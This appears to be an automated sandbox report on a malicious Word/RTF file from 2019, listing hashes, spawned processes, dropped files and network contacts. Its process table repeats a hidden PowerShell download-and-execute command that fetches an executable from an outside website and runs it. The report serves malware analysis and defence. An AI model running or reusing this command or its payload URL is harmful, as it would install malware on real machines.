File name: | f48915728045ced5b165fe6af946d82a88c03446281175e7de64a6214eea84ff.doc |
Full analysis: | https://app.any.run/tasks/8d8b945e-99f0-4466-841a-67e8d43c532a |
Verdict: | Malicious activity |
Analysis date: | March 14, 2019, 06:55:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 72630A05A8F1C7192778D65407CD8B65 |
SHA1: | 9FFC130178ED5035E4C0EEA00B53697DBF0217AF |
SHA256: | F48915728045CED5B165FE6AF946D82A88C03446281175E7DE64A6214EEA84FF |
SSDEEP: | 3072:oHGEMV5tEMV5tEMV5tEMV5tEMV5aID4SmHS:VE8tE8tE8tE8tE8aID4S+S |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 57435 |
---|---|
CharactersWithSpaces: | 4 |
Characters: | 4 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:01:07 23:54:00 |
CreateDate: | 2019:01:07 23:54:00 |
LastModifiedBy: | Admin |
Author: | Admin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3456 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f48915728045ced5b165fe6af946d82a88c03446281175e7de64a6214eea84ff.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2264 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2172 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile $ta5fa71 = $env:APPDATA; $fc5b4fe = $ta5fa71 + '\\vbb326.exe'; If (test-path $fc5b4fe) {Remove-Item $fc5b4fe}; $q81b38 = New-Object System.Net.WebClient; $q81b38.Headers['User-Agent'] = 'q81b38'; $q81b38.DownloadFile('https://karenyauphotography.com/website/wp-content/upgrade/RFQ2018.exe', $fc5b4fe); Start-Process -Filepath $fc5b4fe; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | EXCEL.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2352 | "C:\Users\admin\AppData\Roaming\vbb326.exe" | C:\Users\admin\AppData\Roaming\vbb326.exe | powershell.exe | |
User: admin Company: MAPES4 Integrity Level: MEDIUM Description: ORNERIER10 Exit code: 0 Version: 2.09.0009 | ||||
3624 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2108 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile $ta5fa71 = $env:APPDATA; $fc5b4fe = $ta5fa71 + '\\vbb326.exe'; If (test-path $fc5b4fe) {Remove-Item $fc5b4fe}; $q81b38 = New-Object System.Net.WebClient; $q81b38.Headers['User-Agent'] = 'q81b38'; $q81b38.DownloadFile('https://karenyauphotography.com/website/wp-content/upgrade/RFQ2018.exe', $fc5b4fe); Start-Process -Filepath $fc5b4fe; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2192 | "C:\Users\admin\AppData\Roaming\vbb326.exe" | C:\Users\admin\AppData\Roaming\vbb326.exe | — | powershell.exe |
User: admin Company: MAPES4 Integrity Level: MEDIUM Description: ORNERIER10 Exit code: 0 Version: 2.09.0009 | ||||
2560 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2464 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile $ta5fa71 = $env:APPDATA; $fc5b4fe = $ta5fa71 + '\\vbb326.exe'; If (test-path $fc5b4fe) {Remove-Item $fc5b4fe}; $q81b38 = New-Object System.Net.WebClient; $q81b38.Headers['User-Agent'] = 'q81b38'; $q81b38.DownloadFile('https://karenyauphotography.com/website/wp-content/upgrade/RFQ2018.exe', $fc5b4fe); Start-Process -Filepath $fc5b4fe; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2828 | "C:\Users\admin\AppData\Roaming\vbb326.exe" | C:\Users\admin\AppData\Roaming\vbb326.exe | — | powershell.exe |
User: admin Company: MAPES4 Integrity Level: MEDIUM Description: ORNERIER10 Exit code: 0 Version: 2.09.0009 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR867C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2264 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR905F.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2172 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WKV1JENWJB2EI4WFELSW.temp | — | |
MD5:— | SHA256:— | |||
3624 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRABA7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2108 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZFPCYGWQQ4IO9QZ7213Q.temp | — | |
MD5:— | SHA256:— | |||
2560 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRB8B7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2464 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4EADL2G2FP2ADAVBH0R0.temp | — | |
MD5:— | SHA256:— | |||
3256 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRC990.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2644 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2EWANWFGG4DUWXRCSZI0.temp | — | |
MD5:— | SHA256:— | |||
3980 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR1DF9.tmp.cvr | — | |
MD5:— | SHA256:— |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2172 | powershell.exe | 69.195.124.102:443 | karenyauphotography.com | Unified Layer | US | suspicious |
Domain | IP | Reputation |
---|---|---|
karenyauphotography.com |
| unknown |